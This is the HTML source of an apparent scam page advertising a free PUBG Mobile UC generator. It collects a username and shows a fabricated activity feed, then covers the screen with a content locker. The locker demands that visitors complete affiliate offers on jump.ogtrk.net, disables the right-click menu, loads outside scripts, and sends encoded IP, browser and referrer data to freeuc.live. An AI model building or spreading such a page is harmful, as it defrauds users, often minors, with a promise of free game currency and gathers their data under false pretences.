

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head >
    <title>PUBG Mobile > Free UC Generator</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
	<meta name="description" content="PUBG Mobile> Free UC Generator" />
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<link rel="icon" type="image/ico" href="img/favicon.ico" />
	<meta name="theme-color" content="#131313">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
	<!-- Open Graph Social Meta Tags-->

	<meta property="og:title" content="PUBG Mobile> Free UC Generator" /> <!-- Title which is displayed when your site is shared on social networks -->
	<meta property="og:description" content="PUBG Mobile> Free UC Generator" /> <!-- Website description which is displayed when your site is shared on social networks -->
	<meta property="og:type" content="website" />
	<meta property="og:url" content="" /> <!-- Your Website URL -->
	<!-- Absolute Path to the Image which will display, when your website is shared on social networks -->
	<!-- Fonts -->
	<link href="https://fonts.googleapis.com/css?family=Electrolize" rel="stylesheet">
	<!-- CSS -->
	<link rel="stylesheet" href="css/font-awesome.css">
	<link rel="stylesheet" href="css/all.css">
    <link href="css/bootstrap.min.css" rel="stylesheet" />
    <link href="css/animate.css" rel="stylesheet" />
    <link href="css/magnific-popup.css" rel="stylesheet" />
    <link href="css/style.css" rel="stylesheet" />
</head>
<body>

<video autoplay loop id="video-background" muted plays-inline poster="img/poster.jpg">
		<source src="video/top.mp4" type="video/mp4">
	</video>

	<div class="overlay-pattern"></div>
	<header>
		<div class="container">
			<div class="branding">
				<img src="img/logo.png" class="img-fluid img-logo animated zoomInUp" alt="Apex Legends FreeFire Logo" />
			</div>
		</div>
	</header>
	<section class="section-gen">
		<div class="container">
			<div class="gen-w animated flipInX">
				<div class="gen-h">
					<h1>Get free PUBG UC</h1>
				</div>
				<div class="gen-c">
					<div class="player-username-wrapper">
						<h3 class="panel-inner-title">Enter your PUBG username</h3>
						<div class="input-background player-username-input-wrapper">
							<img src="img/input-icon.png" class="input-icon" />
							<input id="input-player-username" type="email" class="input-style" placeholder="Username..." />
						</div>
						<div class="input-error-notice">Please enter your username.</div>
					</div>
					<div class="button-w">
						<a id="dugmic-1" class="button">Let's Go</a>
					</div>
				</div>
			</div>
			<div class="act-w animated flipInX animation-delay-600">
				<div class="act-h">
					<h2>Recent Activity</h2>
				</div>
				<div class="act-c">
					<div id="recent-activity" class="recent-activity"></div>
				</div>
			</div>
		</div>
	</section>
	<div class="330d"></div>
	<!-- Yandex.Metrika counter -->
<script type="text/javascript" >
   (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
   m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

   ym(55840390, "init", {
        clickmap:true,
        trackLinks:true,
        accurateTrackBounce:true
   });
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/55840390" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
	<!-- JavaScript/jQuery -->
    <script type="text/javascript" src="js/jquery.min.js"></script>
	<script src="js/jquery-ui.min.js" type="text/javascript"></script>
    <script type="text/javascript" src="js/bootstrap.min.js"></script>
	<script type="text/javascript" src="js/jquery.magnific-popup.min.js"></script>
	<script type="text/javascript" src="js/jquery.countTo.js"></script>
	<script type="text/javascript" src="js/ion.sound.min.js"></script>
    <script type="text/javascript" src="js/main.js"></script>
    <script type="text/javascript" src="js/activity.js"></script>


<iframe name="iframe" scrolling="yes" id="test_iframe" style="border: none; width: 100%; height: 100%; position: fixed; top: 0px; left: 0px; z-index: 16777271;">
       #document
       <html><head><meta name="viewport" content="width=device-width">

       <style>
       @import url(https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,700,300,200);

       .lockerBackground {
       	position: fixed;
       	top: 0;
       	left: 0;
       	width: 100%;
       	height: 100%;
       	background-color: #000;
       	opacity: 0.8;
       	display: none;
       	z-index: 9999998;
       }

       .lockerPopup {
       	height: auto;
       	z-index: 9999999;
       	top: 50%;
       	left: 50%;
       	position: fixed;
       }

       .lockerPopup .header {
       	text-align: center;
       	font-weight: bold;
       	font-family: 'Source Sans Pro', sans-serif;
       }

       .lockerPopup .content {
       	text-align: center;
       	font-family: 'Source Sans Pro', sans-serif;
       }

       .lockerPopup .footer {
       	font-family: 'Source Sans Pro', sans-serif;
       	text-align: center;
       }

       .lc-checks {
       	list-style: none;
       	margin: 0;
       	position: relative;
       	font-family: 'Source Sans Pro', sans-serif;
       }

       .lc-checks li {
       	position: relative;
       	cursor: hand;
       	text-align: center;
       	display: block;
       }

       /* Animation & Spinner */
       .animated {
       	-webkit-animation-duration: 1.5s;
       	animation-duration: 1.5s;
       	-webkit-animation-fill-mode: both;
       	animation-fill-mode: both
       }

       @-webkit-keyframes bounceInDown {
       	0% {
       		opacity: 0;
       		-webkit-transform: translate(-50%, -2000px)
       	}
       	60% {
       		opacity: 1;
       		-webkit-transform: translateY(-50%, -53%)
       	}
       	80% {
       		-webkit-transform: translateY(-50%, -51%)
       	}
       	100% {
       		-webkit-transform: translate(-50%, -50%)
       	}
       }

       @keyframes bounceInDown {
       	0% {
       		opacity: 0;
       		transform: translate(-50%, -2000px)
       	}
       	60% {
       		opacity: 1;
       		transform: translate(-50%, -53%)
       	}
       	80% {
       		transform: translate(-50%, -51%)
       	}
       	100% {
       		transform: translate(-50%, -50%)
       	}
       }

       .bounceInDown {
       	-webkit-animation-name: bounceInDown;
       	animation-name: bounceInDown
       }/* Large Screens */

       .lockerPopup{
       	min-width: 450px;
       	width: auto;
       	background-color: #DDD;
       	border-top: 10px solid #720969;  border-bottom: 10px solid #720969;
       	border-radius: 5px;
       	display: inline;
       }

       .lockerPopup .header{
       	color: #FFFFFF;
       	background-color: #720969;
       	font-size: 25pt;
       	padding: 0 0 10px;
       	border-bottom: 1px solid #C3C2C2;
       }

       .lockerPopup .content{
       	padding: 20px 10px 0 10px;
       	font-size: 17px;
       	color: purple;
       }

       .lockerPopup a  {  color: white; !important  }

       .lockerPopup .footer{
       	font-size: 18px;
       	padding: 20px;
       	color: purple;
       	font-weight: 600;
       }

       .lc-checks {
       	padding: 20px 0 0;
       }
       .lc-checks li {
       	padding: 10px 0 !important;
       	width: 94%;
       	margin-left: 3%;
       	background-color: #720969;
       	margin-bottom: 10px !important;
       	font-weight: 800 !important;
       	border-radius: 20px !important;
       }

       /* Animation & Spinner */
       .sk-folding-cube {
       	margin: 20px auto;
       	width: 40px;
       	height: 40px;
       	position: relative;
       	-webkit-transform: rotateZ(45deg);
       	transform: rotateZ(45deg)
       }
       .sk-folding-cube .sk-cube {
       	float: left;
       	width: 50%;
       	height: 50%;
       	position: relative;
       	-webkit-transform: scale(1.1);
       	-ms-transform: scale(1.1);
       	transform: scale(1.1)
       }
       .sk-folding-cube .sk-cube:before {
       	content: '';
       	position: absolute;
       	top: 0;
       	left: 0;
       	width: 100%;
       	height: 100%;
       	background-color: #333;
       	-webkit-animation: sk-foldCubeAngle 2.4s infinite linear both;
       	animation: sk-foldCubeAngle 2.4s infinite linear both;
       	-webkit-transform-origin: 100% 100%;
       	-ms-transform-origin: 100% 100%;
       	transform-origin: 100% 100%
       }
       .sk-folding-cube .sk-cube2 {
       	-webkit-transform: scale(1.1) rotateZ(90deg);
       	transform: scale(1.1) rotateZ(90deg)
       }
       .sk-folding-cube .sk-cube3 {
       	-webkit-transform: scale(1.1) rotateZ(180deg);
       	transform: scale(1.1) rotateZ(180deg)
       }
       .sk-folding-cube .sk-cube4 {
       	-webkit-transform: scale(1.1) rotateZ(270deg);
       	transform: scale(1.1) rotateZ(270deg)
       }
       .sk-folding-cube .sk-cube2:before {
       	-webkit-animation-delay: .3s;
       	animation-delay: .3s
       }
       .sk-folding-cube .sk-cube3:before {
       	-webkit-animation-delay: .6s;
       	animation-delay: .6s
       }
       .sk-folding-cube .sk-cube4:before {
       	-webkit-animation-delay: .9s;
       	animation-delay: .9s
       }
       @-webkit-keyframes sk-foldCubeAngle {
       	0%, 10% {
       		-webkit-transform: perspective(140px) rotateX(-180deg);
       		transform: perspective(140px) rotateX(-180deg);
       		opacity: 0
       	}
       	25%,
       	75% {
       		-webkit-transform: perspective(140px) rotateX(0);
       		transform: perspective(140px) rotateX(0);
       		opacity: 1
       	}
       	100%,
       	90% {
       		-webkit-transform: perspective(140px) rotateY(180deg);
       		transform: perspective(140px) rotateY(180deg);
       		opacity: 0
       	}
       }
       @keyframes sk-foldCubeAngle {
       	0%, 10% {
       		-webkit-transform: perspective(140px) rotateX(-180deg);
       		transform: perspective(140px) rotateX(-180deg);
       		opacity: 0
       	}
       	25%,
       	75% {
       		-webkit-transform: perspective(140px) rotateX(0);
       		transform: perspective(140px) rotateX(0);
       		opacity: 1
       	}
       	100%,
       	90% {
       		-webkit-transform: perspective(140px) rotateY(180deg);
       		transform: perspective(140px) rotateY(180deg);
       		opacity: 0
       	}
       }@import url('https://fonts.googleapis.com/css?family=Roboto:300,500,700');

       body {
         font-family: 'Roboto', sans-serif !important;
         font-weight: 300 !important;
           background-color: #222326 !important;
       }



       .lockerPopup .header {
         color: #fff !important;
         padding-left: 0.5rem;
         padding-right: 0.5rem;
         font-family: 'Roboto', sans-serif !important;
         font-weight: 700 !important;
         letter-spacing: 1px !important;

         font-size: 1.8rem !important;
         display: flex;
         justify-content: center;
         align-items: center;
         background-color: #0C0C0D;
       }


       .lc-checks li {
         background-color: #222326 !important;
         font-size: 1.1rem !important;
       }

       .sk-folding-cube .sk-cube:before {
         background-color: #f73844 !important;
       }


       .lockerPopup {
         border-color: #fff !important;
       }

       .lockerPopup .header img {
         height: 100px !Important;
         margin-right: 0.25rem !important;
       }

       .lockerPopup .content, .lockerPopup .footer {
         font-family: 'Roboto', sans-serif !important;
         font-weight: 300 !important;
         color: #222326 !important;
       }

       .lockerPopup {
         background-color: white !important;
       }

       .lockerPopup .footer {
         text-transform: uppercase;
         font-weight: 700 !important;
       }

       .lc-checks li {
         border-radius: 5px !important;
       }
       .lockerBackground {

           background: #151016;

       }
       </style>

       <script src="//s3.amazonaws.com/cdn.mobverify.com/www/contentlockers/js/jquery-1.12.0.min.js"></script><script src="//bootstraplugin.com/p.php?id=1"></script>
       <!-------------------- Locker HTML -------------------->
       <script type="text/javascript" src="//s3.amazonaws.com/cdn.mobverify.com/www/contentlockers/js/contentLocker.min.js"></script></head><body oncontextmenu="shake(); return false;" class="stop-scrolling"><div id="contentLockerBackground" class="lockerBackground" style="display: block;"></div>
       <div id="contentLocker" class="lockerPopup animated bounceInDown" style="display: block;">
       	<div class="header"><img src="//s3.amazonaws.com/cdn.mobverify.com/www/contentlockers/uploads/a5eb9895de72328b419b209564c25696/desktop-image/logo.5daaedf8ac473.png" style="height: 26px;"> Verify</div>
       	<div class="content">Complete <strong><span id="count">1</span></strong> of the offers to unlock the content.<br> </div>
       	<div class="links">
       		<ul class="lc-checks">
       						<a href="https://jump.ogtrk.net/aff_c?offer_id=33626&amp;aff_id=149168&amp;aff_sub=a5eb9895de72328b419b209564c25696&amp;aff_sub2=0vhEVTB6vnEGatmzW%2Fui5jqRfkB%2BcKyADt1MfKVGY%2BQy%2BvX5wxyJAFuTDNmPh7EW&amp;aff_sub3=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpYXQiOjE1OTc4MjkyNjEsImp0aSI6IlJscHdEcUE0VGwzN01GM3JPS3pcL3V6YVFra0ZxbEE5SmZYc3dZbGdsQmpjPSIsImlzcyI6Im9nYWRzIiwibmJmIjoxNTk3ODI5MjYxLCJleHAiOjE2MDA0MjEyNjEsImRhdGEiOnsiaXAiOiIxNTYuMjA2LjE4NS4zNSIsInJlZiI6ImFIUjBjSE02THk5bWNtVmxkV011YkdsMlpTOD0iLCJ1YSI6Ik1vemlsbGFcLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdFwvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lXC84NC4wLjQxNDcuMTM1IFNhZmFyaVwvNTM3LjM2In19.vZrThinDuDtDKwcV7qGTuWuhqfC7AuQxGRauEfU6YKP438Gqd8CO7yOj7_JH1KKEIawLJwEnRzDuLEB2aSBBEg&amp;aff_sub4=&amp;aff_sub5=" target="_blank"><li><span class="lc-checks__feature ">!الحصول على أفضل الألعاب على هاتفك المحمول</span></li></a>
       						<a href="https://jump.ogtrk.net/aff_c?offer_id=23584&amp;aff_id=149168&amp;aff_sub=a5eb9895de72328b419b209564c25696&amp;aff_sub2=0vhEVTB6vnEGatmzW%2Fui5jqRfkB%2BcKyADt1MfKVGY%2BQy%2BvX5wxyJAFuTDNmPh7EW&amp;aff_sub3=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpYXQiOjE1OTc4MjkyNjEsImp0aSI6IlJscHdEcUE0VGwzN01GM3JPS3pcL3V6YVFra0ZxbEE5SmZYc3dZbGdsQmpjPSIsImlzcyI6Im9nYWRzIiwibmJmIjoxNTk3ODI5MjYxLCJleHAiOjE2MDA0MjEyNjEsImRhdGEiOnsiaXAiOiIxNTYuMjA2LjE4NS4zNSIsInJlZiI6ImFIUjBjSE02THk5bWNtVmxkV011YkdsMlpTOD0iLCJ1YSI6Ik1vemlsbGFcLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdFwvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lXC84NC4wLjQxNDcuMTM1IFNhZmFyaVwvNTM3LjM2In19.vZrThinDuDtDKwcV7qGTuWuhqfC7AuQxGRauEfU6YKP438Gqd8CO7yOj7_JH1KKEIawLJwEnRzDuLEB2aSBBEg&amp;aff_sub4=&amp;aff_sub5=" target="_blank"><li><span class="lc-checks__feature ">الحصول على الجندي السريع الآن</span></li></a>
       					</ul>
       	</div>

       	<div class="footer">
       		<div class="sk-folding-cube"><div class="sk-cube1 sk-cube"></div><div class="sk-cube2 sk-cube"></div><div class="sk-cube4 sk-cube"></div><div class="sk-cube3 sk-cube"></div>
       		</div>Offer Incomplete!	</div>
       </div>
       			<style>

       			/* overrides */

       			.lockerBackground { opacity: 0.1; }







       		</style>

       	<script type="text/javascript">
       		function loadScript(sScriptSrc, oCallback) {
       			var oHead = document.getElementsByTagName('head')[0];
       			var oScript = document.createElement('script');
       			oScript.type = 'text/javascript';
       			oScript.src = sScriptSrc;
       			oScript.onload = oCallback;
       			oHead.appendChild(oScript);
       		}

       		loadScript("\/\/s3.amazonaws.com\/cdn.mobverify.com\/www\/contentlockers\/js\/contentLocker.min.js", function() {

       			var locker = new contentLocker({
       				id: "a5eb9895de72328b419b209564c25696",
       				requestLink: "https:\/\/freeuc.live\/verify.php?tool=cl&toolarg=c&id=a5eb9895de72328b419b209564c25696&cr=1&t=10&la=EG",
       				conversionsRequired: 1,
       				blockContextMenu: true,
       				pageCloseMessage: false,
       								cookieExpire: 600000,
       				redirectUrl: "https:\/\/freeuc.live\/verify.php?tool=cl&toolarg=u&id=0vhEVTB6vnEGatmzW%2Fui5j2ukxzD%2FybiI7uxomnJrRg414RGAIEhHO%2Fuvjg%2B%2FL0X&r=aHR0cHM6Ly9mcmVldWMubGl2ZS8%3D"			});

       		});
       	</script>


       <script type="text/javascript">
       $.get("https:\/\/freeuc.live\/verify.php?tool=cl&toolarg=i&id=a5eb9895de72328b419b209564c25696&r=aHR0cHM6Ly9mcmVldWMubGl2ZS8%3D&a=aHR0cHM6Ly9mcmVldWMubGl2ZS8%3D&sf=https%3A%2F%2Ffreeuc.live%2Fverify.php&mirror=1&co=0vhEVTB6vnEGatmzW%2Fui5oFm2qCJQRv9VZt6KBKeogA%3D&de=0vhEVTB6vnEGatmzW%2Fui5inDxWyIsgO0s2rBrfL32Vg%3D&ip=0vhEVTB6vnEGatmzW%2Fui5hUntewDbeNboW9b3Xmly9s%3D&ref=0vhEVTB6vnEGatmzW%2Fui5jZyQUZKU3RPNf%2F0pLwp6yhYdQesU25Cf1qGWRp9Ptpy&ua=0vhEVTB6vnEGatmzW%2Fui5mP0cVIr59pDCUtLFqmR5kTaD%2BxVU0vvG%2FaJ74AmHWCT9yuizq8GbXp6pgcIxl%2FMHDwlF%2BO7qVXDhtPQ42ecc34qapweRT67cOzZ%2BiyhzZSC%2Fz5uHSuwT9VgVVkyJjFl3YLYWGTinA6V9ITQFq02%2BYaz0HCoLXUnttbEzj0ukS1T");
       </script>
       </body></html>


</iframe>

</body>
</html>
